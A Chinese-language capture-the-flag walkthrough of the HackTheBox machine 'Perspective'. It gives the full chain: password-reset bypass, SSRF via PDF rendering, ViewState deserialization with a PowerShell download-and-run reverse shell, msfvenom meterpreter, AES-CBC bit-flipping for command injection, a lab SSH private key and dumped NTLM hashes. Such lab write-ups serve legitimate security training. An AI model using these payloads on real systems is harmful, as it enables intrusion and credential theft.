基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ nmap -sC -sV 10.10.11.151
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-01 13:31 CST
Nmap scan report for 10.10.11.151
Host is up (0.20s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
|   2048 d6:7f:3f:d4:22:15:ce:64:f3:c8:00:79:bf:f6:f8:f8 (RSA)
|   256 08:c6:d4:f3:98:84:0f:fd:4b:ed:e3:a6:25:bd:e7:70 (ECDSA)
|_  256 32:81:6a:8b:4d:f9:61:09:ff:d3:99:6c:e7:3f:a3:ac (ED25519)
80/tcp open  http    Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 133.66 seconds

80

添加hosts后访问,一个NPRS:

1
10.10.11.151 perspective.htb

NPRS

注册登录,support那里可以得到管理员邮箱:

1
admin@perspective.htb

reset password

登录时选择忘记密码,第一步输入自己的注册邮箱,第二步密保问题留空,拦截修改为admin邮箱,成功重置admin密码

Admin Panel

管理员功能是加载用户信息生成pdf:

include file

回到普通用户界面,创建新商品,上传图片功能,结合web应用,进行文件读取:

根据web.config内容,下一步是localhost的8080

1
2
3
4
5
6
<appSettings>
    <add key="environment" value="Production" />
    <add key="Domain" value="perspective.htb" />
    <add key="ViewStateUserKey" value="ENC1:3UVxtz9jwPJWRvjdl1PfqXZTgg==" />
    <add key="SecurePasswordServiceUrl" value="http://localhost:8000" />
  </appSettings>

local 8080

这里结合admin的pdf功能,Description那里加载我们控制的html,其中是iframe加载local 8080:

渲染过程中会执行iframe加载local 8080,是一个swagger:

Description

1
<META HTTP-EQUIV="refresh" CONTENT="0;url=http://10.10.14.8/test.html">

test.html

1
2
<iframe src="http://localhost:8000/" height="2000px" width="2000px" >
</iframe>

Decrypt

后面就是一步步获取信息,调用接口解密ViewStateUserKey:

1
SAltysAltYV1ewSTaT3

swagger.html

1
<iframe src= "http://localhost:8000/swagger/v1/swagger.json" height= "2000px" width= "2000px" ></iframe>

decrypt.html

1
2
3
4
5
6
7
8
9
10
11
<html>
<body>
<h1>Pwned</h1>
<p><br></p>
<form id="Pwnform" target="iframe" method="post" action="http://localhost:8000/decrypt?cipherTextRaw=ENC1%3a3UVxtz9jwPJWRvjdl1PfqXZTgg%3d%3d">
<input type="text">
</form>
<iframe name="iframe"></iframe>
<script type="text/javascript">document.getElementById('Pwnform').submit();</script>
</body>
</html>

ViewState 反序列化

拿到ViewStateUserKey,后续就是反序列化,其他需要的信息都在前面的web.config中可以得到:

1
2
3
C:\Users\miao\Desktop\ysoserial-1.34\Release>ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.8/Invoke-PowerShellTcp.ps1')" --generator=0414C274 --validationalg="SHA1" --viewstateuserkey="SAltysAltYV1ewSTaT3" --validationkey="99F1108B685094A8A31CDAA9CBA402028D80C08B40EBBC2C8E4BD4B0D31A347B0D650984650B24828DD120E236B099BFDD491910BF11F6FA915BF94AD93B52BF"

/wEy8gcAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAACUBjw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9InV0Zi04Ij8+DQo8T2JqZWN0RGF0YVByb3ZpZGVyIE1ldGhvZE5hbWU9IlN0YXJ0IiBJc0luaXRpYWxMb2FkRW5hYmxlZD0iRmFsc2UiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbC9wcmVzZW50YXRpb24iIHhtbG5zOnNkPSJjbHItbmFtZXNwYWNlOlN5c3RlbS5EaWFnbm9zdGljczthc3NlbWJseT1TeXN0ZW0iIHhtbG5zOng9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sIj4NCiAgPE9iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT4NCiAgICA8c2Q6UHJvY2Vzcz4NCiAgICAgIDxzZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICAgICAgPHNkOlByb2Nlc3NTdGFydEluZm8gQXJndW1lbnRzPSIvYyBwb3dlcnNoZWxsIElFWCAoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEwLjEwLjE0LjgvSW52b2tlLVBvd2VyU2hlbGxUY3AucHMxJykiIFN0YW5kYXJkRXJyb3JFbmNvZGluZz0ie3g6TnVsbH0iIFN0YW5kYXJkT3V0cHV0RW5jb2Rpbmc9Int4Ok51bGx9IiBVc2VyTmFtZT0iIiBQYXNzd29yZD0ie3g6TnVsbH0iIERvbWFpbj0iIiBMb2FkVXNlclByb2ZpbGU9IkZhbHNlIiBGaWxlTmFtZT0iY21kIiAvPg0KICAgICAgPC9zZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICA8L3NkOlByb2Nlc3M+DQogIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk9iamVjdEluc3RhbmNlPg0KPC9PYmplY3REYXRhUHJvdmlkZXI+C7/gorYt5fyOhhM5rE+jbNw0GNpw

还是普通用户新建商品那里替换,触发反序列化,得到reverse shell:

user flag

得到的webuser用户桌面,user.txt:

webuser_id_rsa

这个windows启用了ssh,当前用户.ssh目录也给出了私钥,方便后续操作:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAzfoQwqu9tIYiy694HbGmT+qw2b+kUTnEcqEOEXv5+vLcVqZ2
APlHTSDj4rSzv+tJoHQiRf3IyVpNNqGw8+wM+P3wdozY66BUPHqz6FpRHxcMT2Ss
Nk9J9hxTi2L3oBVR83F0abBWnOClOqjrd8SMVRcyCi1/svSdOP8OPh9s+mpa5TG2
KEiI66whlBKKC1N2szF4rQNtkCGUw66zheHSxK5j6axjiP0sstC6hUJy2uqu3DXK
0dOtwMUk5EOpkFPTZxlIzgbUI/CcQ8ipaankvrHrh8x8DKdv9KspzKhLflS5Ayie
3PyFQ5lg9TCLk4dzyeB8YkBkBEXUbCePvNBFRwIDAQABAoIBAFwtqeyE0TwFv3Kq
DzYyt3wSSpzYD+At2wV1oAchFWlB4GuCyVJ8PHV+350oQz0DPgrpjiEGhyHdIKrv
R3KR0+hmNIPJWpZwROJgAz1blew081RgeFVBvJbAbH73hlwEzo0E3BUkTk6cljUf
PWl281ptK/60B+79W5MTSbtxcuLJgcvB/REYU3GPUK/dTSVU7IMV2hBrFP6srlqT
aGZ2ugm6xNV14Iq0KOpuHfYXXSdkklOt+eSZ8AWTQTkZtSfLJUybOaLYStOGn35S
IupwD4kxZbAtX54Avdi8rq61H4TIrM82B2+UpPkdd2P6am822mlQa4lVrnJCbq88
z6Xv6ckCgYEA9+lwddycXp0A4WlhmIu5A1440uZELhAfeRlBQVpeqlF0Ig2XjUyb
WhEu+lMlEfbsiWK/rfIp53uuBkstXc2ImKfhSbys8KMkJKq6Fp+OjbbFYSIS9mSP
f91W658OtfoNG/UHPp74f6/mogsbKpNP0nPDnjFBQLMuL2pYO/Q7p2sCgYEA1LJi
bPM/rpbzyGjJSYd50xNP1ftaUyZwRWCWAgAWLXKVVbuNdPNy6GvjyaNkJcPz3dh+
zSsLZeSyyVWUvFQslkkZaMvWZVDdwh9x8i3N/NhhTbqVTyBBqWTyk0l0WJVcHtUb
q6kSIYucmw/zH9qlpfYHvMWZN2kSHq+kwlMAfJUCgYBmTSpfOJ4+XMOUQQxJCr9a
KHOCdAsGhxi1vDo1YblWxy4JL1qusEIbNKQSIGVXuHF7cAhxG1E3eM4jQrqBzuLj
O8O3zef/lRLBHsKTu1v0Fsv0fT8d9flRZmEL8iL77SejtcU7jhY1erzNeY/ITenO
in7atLCcplQUtOmcM/i56QKBgQDRjiMNBqfSYqUy6ZKPoCt1u4wn3eoDDFcG8383
30/6XO8mtY9MD2NB/LJDgnh0ANiu1NMxXtxu+mDvniLZXfFD7CddqZ7E2WRzEroY
Cert114ez9q1R6mJtIyOcotvj1BgjEQj34KejEeyOoel9azIk1rSMLig8CNLGnAw
iMhs9QKBgQC6pv2GxsrQmUEPiE0vorFtMulMi7vRYe7kfgsohE8grqKzsveLQJok
R+67L9QcuLwo2OWng2d2oEFkx9dx++ewEluo8ZjcOx3TVDIIZDUw4KdD0Q/josqp
RhZbZ6EF094JTnINnexb9OhQMwQJHAhp63o5dH6fFXSTUpW10u+mkA==
-----END RSA PRIVATE KEY-----

信息

8009端口,转发出来,看起来和之前的网站一样

1
ssh -i webuser_id_rsa webuser@10.10.11.151 -L 8009:127.0.0.1:8009

perespective.dll

.net dll反编译,分析代码,重点是token那部分

1
2
C:\WEBAPPS\PartImages_Staging\bin\perespective.dll
C:\WEBAPPS\PartImages_Prod\bin\perespective.dll

密码学领域内容了,token使用AES CBC,前16字节是iv

大概是调用本地命令修改密码,命令注入

CBC attack

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
# 重置密码请求,邮箱填充到16位,获得token解码
a@a.aa++++++++++

$ echo -n vedAtEi1tb8mS67dUSv1CqojLHQPIfwhGxdUofWkhaN40d1KbzY7tKS0gZjr1CMZ  | base64 -d| xxd -p| tr -d "\n"

bde740b448b5b5bf264baedd512bf50aaa232c740f21fc211b1754a1f5a485a378d1dd4a6f363bb4a4b48198ebd42319

# 创建shell,上传到服务器上
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f exe > shell.exe

meterpreter > pwd
C:\x
meterpreter > upload /Users/miao/use_miao_wwwwwww/Hacking/HackTheBox/Perspective/shell.exe
mv shell.exe x.exe

# 前16个字节,即10进制的前32,是IV
>>> data = "bde740b448b5b5bf264baedd512bf50aaa232c740f21fc211b1754a1f5a485a378d1dd4a6f363bb4a4b48198ebd42319"
>>> data[:32]
'bde740b448b5b5bf264baedd512bf50a'

两个xor
# 第一个,原本邮箱
# 6140612e616120202020202020202020
# a@a.aa

# 第二个地方,修改后的命令注入
# 原本的 6140612e6161265c785c782e65786520
# a@a.aa&\x\x.exe 

https://gchq.github.io/CyberChef/#recipe=From_Hex('Auto')XOR(%7B'option':'Hex','string':'6140612e616120202020202020202020'%7D,'Standard',false)XOR(%7B'option':'Hex','string':'6140612e6161265c785c782e65786520'%7D,'Standard',false)To_Hex('None',0)&input=YmRlNzQwYjQ0OGI1YjViZjI2NGJhZWRkNTEyYmY1MGE

bde740b448b5b5bf264baedd512bf50a
->
bde740b448b5b3c37e37f6d31473b00a

得到的结果作为新的IV:
>>> data[32:]
'aa232c740f21fc211b1754a1f5a485a378d1dd4a6f363bb4a4b48198ebd42319'
>>> "bde740b448b5b3c37e37f6d31473b00a" + 'aa232c740f21fc211b1754a1f5a485a378d1dd4a6f363bb4a4b48198ebd42319'
'bde740b448b5b3c37e37f6d31473b00aaa232c740f21fc211b1754a1f5a485a378d1dd4a6f363bb4a4b48198ebd42319'

# 生成新token
https://gchq.github.io/CyberChef/#recipe=From_Hex('Auto')To_Base64('A-Za-z0-9%2B/%3D')Find_/_Replace(%7B'option':'Simple%20string','string':'%2B'%7D,'-',true,false,true,false)Find_/_Replace(%7B'option':'Simple%20string','string':'/'%7D,'_',true,false,true,false)&input=YmRlNzQwYjQ0OGI1YjNjMzdlMzdmNmQzMTQ3M2IwMGFhYTIzMmM3NDBmMjFmYzIxMWIxNzU0YTFmNWE0ODVhMzc4ZDFkZDRhNmYzNjNiYjRhNGI0ODE5OGViZDQyMzE5

vedAtEi1s8N-N_bTFHOwCqojLHQPIfwhGxdUofWkhaN40d1KbzY7tKS0gZjr1CMZ

# 注意前面得到token那里一直中断在那里,不要forward
# 替换新token,重定向到修改密码界面,修改密码发送,触发命令注入

root flag

Administrator桌面,root.txt:

hash

1
2
3
4
5
6
7
8
9
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3ebc094377ee665f31a78f536ba4f1af:::
dbuser:1003:aad3b435b51404eeaad3b435b51404ee:ffdd348640d3215cfe351d5cf928cb93:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
sqladmin:1001:aad3b435b51404eeaad3b435b51404ee:17e1ecc085fb5fd49810495ca173052e:::
sshd:1005:aad3b435b51404eeaad3b435b51404ee:4edb911b4f987283a91a175c6d4445bb:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:7cd9849be63b88b3f4e910cdae120f3d:::
webuser:1004:aad3b435b51404eeaad3b435b51404ee:9c101375df857fad5e6bec682ffa4187:::

参考资料